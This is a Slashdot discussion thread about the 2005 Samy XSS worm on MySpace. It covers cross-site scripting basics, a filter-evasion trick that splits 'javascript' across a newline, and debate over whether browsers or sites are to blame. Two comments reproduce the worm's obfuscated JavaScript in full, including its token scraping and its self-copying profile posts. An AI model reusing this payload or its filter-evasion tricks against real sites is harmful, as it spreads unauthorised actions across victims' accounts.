Don't you hate when you forget stuff?

[UserGoogol]

Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.

FUCK! I knew I forgot to do something. I forgot to set the evil bit!

time to use quoting?

[digitaldc]

Didn't they use quoting?
Maybe next time they might want to look here:
http://shiflett.org/articles/foiling-cross-site-at tacks

Re:Day late, dollar short.

[mwvdlee]

If /. sucks so much, why are you still here?

Re:Day late, dollar short.

Considering that Slashdot links to stories on other sites you're never going to see it here first. Get it?

Re:Day late, dollar short.

[cuzality]

What tech podcasts do you listen to? The only one I have really gotten into is TWiT -- any recommendations?

Woefully inefficient

[jfengel]

How are you gonna make a million friends a day that way? Progress, my boy, progress!

XSS basics

[flanker]

Cross-site scripting is a family of vulnerabilities that share these attributes: a) a web-site that takes and displays text (e.g. Slashdot allows you to post comments) and b) a web browser that processes javascript in webpages.

The exploit involves placing javascript code into your posting on a website, such that when other people visit the website their browsers download your comment with the embedded javascript, which is then processed. The javascript, because it is being processed on your machine as part of the rendering of the page, can be used to exploit all sorts of vulnerabilities within browsers. When you have browsers tightly coupled with operating systems, this can open up some rather scary scenarios.

In this case, the guy just used the vulnerability to make some relatively benign changes, but he could have just as easily exploited some of the many problems with IE to be more malicious.

Re:XSS basics

[ergo98]

Cross-site scripting is a family of vulnerabilities that share these attributes: a) a web-site that takes and displays text (e.g. Slashdot allows you to post comments) and b) a web browser that processes javascript in webpages.

Is that just a classic script injection attack?

I always thought a cross site scripting attack was actually a method for script from one site to use content from another site. e.g. I embed a full-size IFRAME in my site, or I launch a new window, that loads the real PayPal, and from my site I monitor the form controls on the PayPal page, or alternatelly I embed some of another site's script into my site.

Of course browsers should prohibit this sort of cross-site scripting, but there have been cases where the controls have been circumvented.

Re:XSS basics

[flanker]

Referencing your wikipedia link, I describe the Type 2 XSS vulnerability, which is what was used in this case.

When you say "script injection" are you talking about "SQL injection"? THis is where you manipulate data submitted to a database-backed web site to place a SQL statement termination character in the data (knowing that it is going to be put into a SQL INSERT statement). Then you append malicious SQL code which will be executed by the RDBMS of the web-site.

I'm not really sure how your example would work. If you embed the PayPal in an IFRAME on a page hosted on your site, clicks on the PayPal site will be routed to the PayPal server, not yours.

XMLHttpRequest

[matth1jd]

Everyone knows that XMLHttpRequest isn't secure. Where do we go from here? Is there a way to force the object to use SSL? Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?

Re:XMLHttpRequest

[patio11]

What would encryping anything have accomplished, exactly? The problem isn't that someone intercepted a legitimate transfer in the middle and modified it to be evil. The problem is that one end of the legitimate transfer was compromised, and the other end of the legitimate transfer was too trusting of the input from the compromised end, and then happily passed along that input (perfectly legitimately) to other parties who were then compromised themselves.

Re:XMLHttpRequest

[Slashcrap]

Is there a way to force the object to use SSL?

Yes, I'm sure that there is.

Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?

Probably not, for most sites and applications.

But the point is that encrypting the network traffic between the client and the server would have done nothing to prevent this vulnerability. Or most others for that matter. The only thing encryption would prevent is the snooping of traffic between client & server.

Re:XMLHttpRequest

Everyone knows that XMLHttpRequest isn't secure.

What a stupidly unqualified statement.

When is XmlHttpRequest not secure? That's right, when you let random users enter JavaScript/HTML code that is viewable by anyone else.

XmlHttpRequest is just fine if it's written into the application properly.

I'd be dollars to donuts you're one of the imbeciles that turns off cookies, too - meaning instead of passing Cookie: with the HTTP headers us web developers simply append ?cookie= to all of your URL strings and POST forms. Doy...

Obligatory...

[kukickface]

All your friends...All your friends...All your friends are belong to us. Its the mega-happy-funtime disco hit of 2005!

Re:Well, people have been saying it's a security r

[-kertrats-]

They don't have javascript enabled. As far as I can tell, he just used IE's magical ability to run broken code so that the browser would be able to piece together the mess he used, but Myspace wouldnt be able to tell it was javascript.

That's Irrevellant

[BobPaul]

I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering. You can't just block the words "Javascript" and "Script" and call it good.

Re:That's Irrevellant

[Delirium+Tremens]

You're right. The least they could have done was looking at the source code for IE and analyze its logic for the interpretation of script tags.
... Oh wait ...

Re:That's Irrevellant

[Bogtha]

I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering.

That's not the right attitude. The problem lies with web browsers that accept non-standard code.

Malicious code comes in two flavours - code that is outright malicious, and code that is completely benign in browsers that conform to the W3C specifications, but is interpreted wrongly by some browsers to generate a malicious effect.

The first type is easy to filter out, because you can go to the spec and see how things are meant to be interpreted, and from that determine what should be filtered out. The other type, though, is much harder to filter out, as you also need to be aware of all the little quirks and foibles of all browsers likely to be used to access your web application - something that isn't written down anywhere most of the time.

For example, you might have written code that strips out HTML tags. That's fine, except some versions of Netscape Navigator 4.x treat entirely different Unicode characters as if they were < and >. As a web developer, you have no way of knowing about this unless you are privy to some of the most obscure browser trivia in the world, so unless you take a default deny policy and outlaw any non-ASCII characters (goodbye international visitors), you are likely to write code that is vulnerable to this attack - for Netscape 4 users.

Now multiply that problem by all browsers in use today, and all the little quirks and deviations from spec. that they have, and you'll start to get an idea of why it's not feasible for web developers to be responsible for this problem, and why the responsibility lies at the browser developers' feet.

Re:That's Irrevellant

[MikeFM]

The point is that there is no way to know every possible loophole because IE is extremely buggy and nobody outside of M$ can look at the source to figure out all possible problems. Most likely the problem is so big that even with the source you couldn't figure out all the possible exploits in the time it'd take you to just write a better browser.

How else could they block Javascript without eliminating the ability to post bits of code or psuedo-code for artistic or informational reasons? Even then it could probably be snuck in given that code doesn't really have any secret give away footprint that makes it possible to filter out.

About the only way to protect against such a problem is to block any browser from using the site that is to forgiving of bad web code. I'd imagine most other sites that let users post stuff others can read can be infected in a similar way.

I just hope the poor guy that wrote this code doesn't get in trouble. It doesn't sound as if he really knew how fast it'd grow and it was a much needed wakeup call to MySpace and the industry as a whole.

What we really need is for every major website to agree to a blanket anti-IE policy until IE is fixed, with like treatment for any other browser of similar shady quality (none that I can think of), where starting on a certain day all those sites redirect IE users to a site that'll help them download and install their choice of better browser. Firefox, Safari, Opera, or whatever (Lynx anyone?). Get the top ten websites to do that, with an explanation as to why, and you could change a high enough percentage of users over to make a permanent change. Hell, use those browser holes to make installing an alternate browser easy. Once directed to the site explaining the situation have the page offer the choice of available browsers each with an 'Install Now' button next to it. As soon as the user clicks the button install the new browser as the default browser and remove all shortcuts to IE. No need to figure out how to download and install anything after that one click.

Re:That's Irrevellant

[TWX]

And because of that, I still use Netscape 3.0 Gold on GUI machines, and I telnet to port 80 on console machines...

;)

Re:That's Irrevellant

[BKX]

Are you serious?!? You use Telnet? For security? Why not a recent OpenSSH? At least then you'll have some semblence of security instead of plain text over whatever untrusted network. (Whoosh. [Let's out sigh] Now that I've caught my breath.) Man, I don't think I've heard anyone say Telnet in quite a while. Almost had a heart attack.

Re:That's Irrevellant

[maxwell+demon]

One of the problems he exploited was that IE obviously eliminates newline characters before searching for the tags. That is, if you write

"Javas
cript"

inside an attribute, then IE will interpret that as "Javascript" anyway, but it evaded the filter at MySpace (which did scan for "Javascript"). Now I'm not sure that it's really the website's fault not to know about an IE bug which is that stupid.

Re:That's Irrevellant

[SatanicPuppy]

Seems like he could have used the same bug to make "Javascript" into:
j-a-v-a-s-c-r-i-p-t, with each character on a new line. It'd be pretty hard for a filter to catch something like that, though I suppose they could strip out newlines and whitespace as well and just look for character sequences.

What a pain in the butt though. Seems like M$ could just produce a browser that doesn't go out of its way to screw itself.

Re:That's Irrevellant

[techmeltz]

You don't ssh to port 80 to read a web page. dolt.

Re:That's Irrevellant

[lawpoop]

"Malicious code comes in two flavours - code that is outright malicious, and code that is completely benign in browsers that conform to the W3C specifications, but is interpreted wrongly by some browsers to generate a malicious effect."

A bit of nitpicking -- malicious specifically refers to evil intent. If you say that some browsers generate a malicious effect, you are saying that the effect has mental states and that its mental state is desirous of harm.

Diciontary.com says about malicious:
Having the nature of or resulting from malice; deliberately harmful; spiteful

Maybe pick another work other than malicious for your outright/wrong interpretation bad code system.

Re:That's Irrevellant

[radtea]

responsibility lies at the browser developers' feet.

Users want browsers that will render their webpages, including pages they author themselves. Because the average person is not capable of writing a web page that parses, and many tools for writing web pages generate invalid HTML, any standards-compliant browser will not render most of the web. Try running your own web pages through SP using any W3C HTML DTD and see what I mean.

The situation is an artefact left over like a minefield from the browser war in the '90's. If either Netscape or Microsoft had focused in standards-compliance they would have lost market share. It is likely that both companies were actively trying to break standards as a means of locking in users.

Now that things have settled down Microsoft is the only corporate player with an ongoing interest in locking in users, but users are still going to expect browsers to render everything, no matter how malformed. Users experience any failure to render as a browser problem, not an authoring problem. As such, it is going to be difficult to get the web as a whole to be standards-compliant.

One of the fundamental laws of human behaviour was most clearly enunciated by Han Solo: "It's not my fault! It's not my fault!" We can sit back and say that any user of IE deserves to get burned by exploits, or that anyone authoring an invalid web page deserves to not get page views, but the Darwinian market is fundamentally a mechanism for humans to shift blame for their own failures onto others, and users choose IE and users choose MySpace, so neither browser choice nor website choice will ever be accepted as the cause of user's problems.

Re:That's Irrevellant

He means malicious. Specifically, code written with a malicious intent.

Re:That's Irrevellant

[6*7]

I'd consider telnetting to any port dangerous, imagine what could happen if the server started sending terminal control sequences.

Re:That's Irrevellant

[adpowers]

Netscape 3.0? Too high tech for me. My friend reads Gmail with NS 2.0.

Yes, that is a 64K binary being emulated for PPC in Classic (IIRC).

Re:That's Irrevellant

[MCraigW]

That's not the right attitude. The problem lies with web browsers that accept non-standard code.

Uhh.. that would be all of them. If you're reading this page, then your browser is interpreting invalid HTML 4.01.

If you would like to try an experiment to prove it, then do a "View Source" on this page and then save it off as "test.htm". Then upload and validate it here http://validator.w3.org/file-upload.html

I would guess that you decided that it was the web browser's fault, when you thought that IE would interpret invalid HTML while FireFox wouldn't, but it turns out that FireFox interprets invalid HTML too.

Most web pages are invalid HTML, or XHTML, or DHTML, or whatever the W3C is calling the latest version of it.

You can try validating other sites here http://validator.w3.org/detailed.html, you can just enter the URL.

I think that the blame for allowing this particular exploit lies in both camps -- but the blame for creating the problem was the authors.

Re:That's Irrevellant

[Hentai]

That word would be "maleficent". Malicious : Maleficent :: Intent : Effect.

Re:That's Irrevellant

[fbjon]

Ctrl-z would get pressed, and 'reset' would get typed.

Besides, telnetting to a port is useful for testing and debugging. I tend to telnet to port 80 of a host, then type GET / HTTP/1.0 in order to get it's headers, if I don't happen to have a quicker way to do it.

Re:That's Irrevellant

[monkeyboythom]

No. What is relevant is that that dude has to program his friends.

Re:That's Irrevellant

[Bogtha]

I would guess that you decided that it was the web browser's fault, when you thought that IE would interpret invalid HTML while FireFox wouldn't, but it turns out that FireFox interprets invalid HTML too.

Bloody hell, you're pretty damn condescending. Yes, I'm well aware that typical browsers accept invalid HTML. As a rule of thumb, don't assume you need to explain basic workings of browsers to somebody who has just finished talking about obscure bugs in ancient browsers.

My point is that it is this attitude of lax requirements of browsers, rather than failings of web developers, that leads to vulnerabilities like this. You are the one bringing up Firefox, I never mentioned it.

PS: If you're going to talk down to somebody about web development, at least have the foresight to not link to your homepage full of junk code while you are doing so. Transitional? Table layouts? Broken Javascript? You've no business lecturing others on web development.

Re:That's Irrevellant

[6*7]

"Ctrl-z would get pressed, and 'reset' would get typed."

How naive, by then it could already be to late. Consider DSA 697-1: http://www.debian.org/security/2005/dsa-697

It's quiet shocking to find those kind of bugs in ancient programs. More info can be found for eg on http://www.digitaldefense.net/labs/papers/Termulat ion.txt

BTW a simple way to get headers:
lynx -head -dump URL
  or
the live http header plugin for Fire*
  or
(t)ethereal/tcpdump (keep it up to date for the same reason as above)

Re:That's Irrevellant

That doesn't even make sense.

"You don't even make sense!"

Re:That's Irrevellant

[EternityInterface]

That's not the right attitude.

You'll get that attitude after reading the reply to the FAQ question Why is my Profile page suddenly messed up? It has music, sound or strange graphics on it?

Re:That's Irrevellant

[EternityInterface]

My$pace. There we go.

Here is the source:

[rpcxdr]

The source and the explanation.

The Code

[pturpin]

Here is a link to the blog entry the article mentions that contains the code of the worm. (From Evan Martin of Google)

Clever kid...

...I think I definitely want to be his buddy. :)

Re:Day late, dollar short.

[the_wesman]

cause myspace went down

Unpatched security holes?

[phlegmofdiscontent]

Wait, there are unpatched security holes in IE? From all I've heard lately, it's way more secure than Firefox. How could Microsoft let this happen????

Re:Unpatched security holes?

Hello? This is not news.
Microsoft stopped patching critical security holes back in April 2003.
Today we're at minimum 47 unpatched security holes in IE, ranging from code execution over spoofing and XSS to DoS.

Re:Unpatched security holes?

[Blakey+Rat]

IE (and Safari, BTW, made by Apple and the KDE project) allow the web designer to put javascripts inside of CSS tags. Is that a security flaw or not? Could argue either way, I suppose.

Don't blame Microsoft on this one, from reading the technical explaination, it sounds to me like MySpace doesn't have very strong security... their security seemed to be based entirely on searching for specific keywords (like "javascript") in input and blanking them out.

Re:Day late, dollar short.

[gothfox]

Not just that. I don't know about others, but I read slashdot primarily for discussions, not raw news. There is a lot of places to flood you with news, but much less where you can actually read coherent discussions on the subject. Yes, slashdot's moderation system is far from ideal, but there actually _are_ insightful and interesting comments to read, not just "OMG LOL" babble.

Aww...so close...

Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.

"Thankfully"? Isn't that what we want? I mean...not so much the botnet, but more the whole MySpace-being-nuked thing. :-)

Emokids cry out!

[Kylere]

In a collective mass, millions of overly pale, and under-educated emo kids could be heard to scream as their only hope of getting laid timed out.

Myspace, The AOL for 2005!

Re:Well, people have been saying it's a security r

I browse with javascript disabled and have for 5 years, it immunises me against the majority of browser exploits. You can't stop morons running embeded script but webmasters can at least make sure their site works for that 5% of us with a clue. For more complex webapps, they can provide the security concious with an alternate signed tarball or browser extension (that doesn't load/eval() script from remote servers).

maybe...

after perusing his site, i happened to notice this in the comments on one of the pages...

0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '');AG=AG.substring(61,AG.length);if(AG.indexOf('s amy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}v ar AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658 ';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.a ddFriendsProcess&Mytoken='+AR,nothing,'POST',param sToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xm lhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.se tRequestHeader('Content-Type','application/x-www-f orm-urlencoded');xmlhttp2.setRequestHeader('Conten t-Length',BK.length)}xmlhttp2.send(BK);return true}">

wonder what it is ;)

Re:maybe...

erherm, i mean this
div id=my,code style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}cat ch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromU RL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '');AG=AG.substring(61,AG.length);if(AG.indexOf('s amy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}v ar AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658 ';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.a ddFriendsProcess&Mytoken='+AR,nothing,'POST',param sToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xm lhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.se tRequestHeader('Content-Type','application/x-www-f orm-urlencoded');xmlhttp2.setRequestHeader('Conten t-Length',BK.length)}xmlhttp2.send(BK);return true}">div

Re:Day late, dollar short.

[Iriel]

This is partially based on my programming prefs, but I listen to TWiT, CradCast, Pro PHP, and WebDevRadio (and I'm still looking for more good ones with more frequent updates). Though I've been meaning to check out http://www.techpodcasts.com/

test

This is a test of the JS exploit.

STD

[Washizu]

Who didn't know that place was full of STDs? (Script Transmitted Diseases)

Not Funny!

[boy_of_the_hash]

Sorry, Firefox doesn't execute script from within CSS files.

Re:Not Funny!

"Sorry, Firefox doesn't execute script from within CSS files."

Calm down, fanboy; nobody said it did. That's not even how the code worked to begin with. The code worked by using JavaScript in style tags.

Re:Day late, dollar short.

[(H)elix1]

If /. sucks so much, why are you still here?

For the chicks, duh...

From the horse's mouth

[FluffyPanda]

You can read the (entertaining) description of the hack in his own words here:

Samy is my hero

Re:From the horse's mouth

[jehiah]

MOD PARENT UP it's much nicer to read a first hand report - this one from the horses mouth.

Quick and Dirty solution

[ajs318]

My proposed "quick and dirty" solution is this.

<script type="text/javascript">
    for (i = 0; i < 1000; ++i) {
        alert("Disable JavaScript for this site!");
    };
    alert("OK ..... Don't say you weren't warned.");
</script>

Now you can be sure that  {almost*}  nobody visiting your site has JavaScript enabled, so there is no chance of this affecting them.

* There probably is _somebody_ _somewhere_ who really is masochistic enough to click the thing 1001 times.  Their computer probably is infected with several viruses already, though.

Re:Quick and Dirty solution

[maxwell+demon]

Well, just remove the "++i", and you can also remove the "almost" part of your description.
If you find a corresponding browser vulnerability, you just might switch off JavaScript with your JavaScript code, of course :-)

Re:Quick and Dirty solution

[arkanes]

This actually brings to mind something which has bugged me for a long time. Why the hell are JS dialogs modal?

while (1) {alert("nope!");} Will DOS any browser in use today. You'll have to kill it via some OS level functionality, because alerts are modal and prevent interaction with the browser chrome. I understand that the JS spec is based on "run to completion", but is there any reason why JS alerts (and confirms, etc) shouldn't be model to the document canvas (disabling interaction with the canvas, but not browser chrome) rather than the browser itself?

Re:Quick and Dirty solution

Or you could just hold the enter key...

Re:Quick and Dirty solution

[WWWWolf]

Now you can be sure that {almost*} nobody visiting your site has JavaScript enabled, so there is no chance of this affecting them.

Or, as thousands of sites who still block by user-agent seemingly don't know, nobody is visiting the site.

People are lazy. What do you think is more likely - that they turn off Javascript which seems to have worked just fine so far and not broken anything, or decide to never, ever click on that link that leads to your site?

Re:Quick and Dirty solution

They are not modal on Opera, although they will prevent any interaction with the tab that generated the alert, everything else works just fine - I can also use the tab bar or the window sidebar to close it or simply disable javascript at any time with the menu or F12.

Re:Quick and Dirty solution

[barryman_5000]

I believe its because of the old Apple II syndrome. It worked so well to have only one focused window back then and people were more patient too.

Re:Quick and Dirty solution

Firefox Bugzilla has a bug request (copy and paste URL): https://bugzilla.mozilla.org/show_bug.cgi?id=61098

Unfortunantely, no one thinks it's worth the time to implement.

Re:Quick and Dirty solution

[someonewhois]

Slight work around -- hold enter while clicking madly on the X (either window X or tab X, or middle clicking the tab). This'll, at least on Firefox, let you click the X before it spawns the next one (since alert boxes are also blocking in JS itself).

Re:Quick and Dirty solution

[Sloppy]

Unfortunately(?), disabling Javascript on myspace, pretty much disables myspace. Mspace's designers use Javascript for everything, even as a substitute for hyperlinks in some cases! There's no legitimate reason to do that, which makes me sometimes wonder if the intent is to make the site less usable. It pisses me off when I can't open something in a new tab, due to it being a "javascript link" instead of a normal hyperlink.

Myspace is crap. And I visit it almost every day. *sigh*

Re:Quick and Dirty solution

[m50d]

while (1) {alert("nope!");} Will DOS any browser in use today. You'll have to kill it via some OS level functionality,

Not links, any javascript dialog has an extra button "kill script". I wish the supposedly more featureful alternatives would adopt this simple improvement.

Re:Quick and Dirty solution

[matts-reign]

I remember using MyIE2 at some point (maxthon now isn't it?).

What i liked was that if a javascript popup came up, in the status bar it read

"Hold Ctrl to suppress any more alerts" or something to that effect.

So if you would click on Ok while holding Ctrl the script was suppressed.

No irony was intended

[benhocking]

No, actually my pinky finger slipped and hit the "l" instead of the ";". I won't even try to explain how such a slip is possible as my other finger should have been in the way. I think I'm gonna blame quantum tunneling.

Re:No irony was intended

[JasonKChapman]

I think I'm gonna blame quantum tunneling.

Blame Heisenberg. At any given time every key is either pressed or not until you hit "submit" and find out for sure.

Re:No irony was intended

[Steele]

This is a great comment, however I quietly lament that the number of people that will understand this is rapidally diminishing..

Re:No irony was intended

[CreatureComfort]

Heisenberg? Wouldn't that be Schrodinger?

Heisenburg just says that you can never really be sure where the keys actually are, or your fingers for that matter.

Re:No irony was intended

[gitchel]

IIRC, wouldn't Schrodinger assume that no keys were pushed at all until what you wrote was read? In other words, I think the typo can certainly be blamed on the reader in this case. He's the one who killed the cat by opening the box.

Re:No irony was intended

[SatanicPuppy]

I think Heisenberg would have said that you can know where the key is, or you can press it, you just can't do both.

Re:No irony was intended

[syntaxglitch]

Wouldn't that be more like being able to know where a key is or whether you've pressed it, but not both? :)

Re:No irony was intended

[Senzei]

You actually shouldn't be too upset, so long as you do not ask anyone if they get the comment you are as safe in assuming that they do understand it as you are that they do not.

Re:No irony was intended

[blincoln]

I've been trying to slowly re-educate the local population.

I have Schroedinger's wavefunction equation tattooed on my arm, and every time someone asks about it, I explain about the cat and the two-slit experiment. It would probably be more effective if I printed out pamphlets, because there isn't enough time to even explain the cat properly if a grocery-store clerk asks.

Re:No irony was intended

[Mechcozmo]

pqnw[ei[fjhsaidfhj;nqwjerofhsadkfk;naljq1234358t3[ -u2=saerjif\]njnmxnvm,zqa';sdfk,,...lkojadsfAD

I pressed every key on the keyboard at any given time given the limits of time, space, and the 3rd dimension. Am I not understanding something?

Re:No irony was intended

Yes, it's a shame that not every Slashdot member is also a member of your particular subset of geekdom. Condescending Fuckwit.

Re:No irony was intended

[Red+Flayer]

Actually Heisenberg would say that you can only know one of the following:

(1) which of your fingers are depressing keys (their momentum); or

(2) at which keys your fingers may or may not be depressing (their location).

Freud would add that any keys that are depressed have sexual issues with a parent.

Re:No irony was intended

[Red+Flayer]

Schrodinger would assume that all possible combinations and permutations of the keys had been pushed, until observation reveals what happened.

Re:No irony was intended

It's also a shame that any Slashdot member would consider a layman's knowledge of important scientific revolutions in the past century to be only a 'subset of geekdom'.

I don't think it's unreasonable to think that the general population should be at least somewhat educated. He wasn't asking you to have a physics degree.

Re:No irony was intended

[GodfatherofSoul]

Well, now that I have broadband access to the internet, I always know where my hands are when I'm online.

Re:No irony was intended

Heisenberg was the one I think he wass taking about. Heisenberg Uncertainy Principal the great friend of quantum physics.

Re:No irony was intended

... as are the number of people that can spell "rapidly".

Re:No irony was intended

[xTantrum]

yeah you can do both. or maybe both is already being done. it only comes into existance when you look at it and notice it and or choose.

Re:No irony was intended

[Irish_Samurai]

I'm probably way off, but I thought according to Schrodinger that the key would be both down and up.

Re:No irony was intended

[tolkienfan]

I thought this comment through, and decided not to post it:

"No, you can know the position of your fingers, or the momentum, but not both".

Wow, I'm glad I didn't post that.

Re:No irony was intended

[NtroP]

I have Schroedinger's wavefunction equation tattooed on my arm

You sir, are a true geek among men. I salute you.

Re:No irony was intended

[CreatureComfort]

And yet, still no Shakespear...

Re:No irony was intended

[EternityInterface]

No-one seems to like Nietzche here, and then philosphy applies to everything. So they're really missing out on things. What I do notice is the only targets of quoting is those constitution guys. Fuck you guys. This is after reading ~10k posts, so, fuck you guys.

Re:No irony was intended

[Hal_Porter]

That's Nietzsche. Democracy and Christianity have turned you into a feeble minded untermensch.

Re:No irony was intended

[EternityInterface]

the irrationality of a thing
is no argument against its existence
rather a condition of it
{"on cats"}

With myspace popularity, comes the problems

[British]

1. Embedded music videos. Anyone have a host list of the music video providers? I'd like to resolve them to 127.0.0.1
2. Bogus accounts. There is a huge rash of "stripper" accounts, consisting of minimal user info, that messages out to single guys to get them to email them at their yahoo accounts. They typically have 4 or 5 risque pictures, making everyone think all women are whores. Bad bad bad.
3. Myspace needs a "safe mode" where the excessively bad(bells and whistles) profiles that sodomize any web browser can be avoided.
4. Why does clicking to one of your groups have to open in a new window? WHY? The top-bar navigation makes that un-neccessary.

But still, myspace is better than orkut. People actually use myspace.

Re:With myspace popularity, comes the problems

[ptomblin]

5. Image leeches. Whenever I see a lot of hits on one of my pictures on my web site, it's because some asshole at MySpace has embedded it in his page without asking permssion, without copying it, and without giving it any attribution.

Which is why I now have

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://..myspace.com/.*$ [NC]
RewriteRule .*\.jpg http://xcski.com/~ptomblin/leech.png [R,L]

in my Apache configuration.

Re:With myspace popularity, comes the problems

[British]

I had a problem with some teenybopper on livejournal, using a Blondie image from my web page as her LJ background.

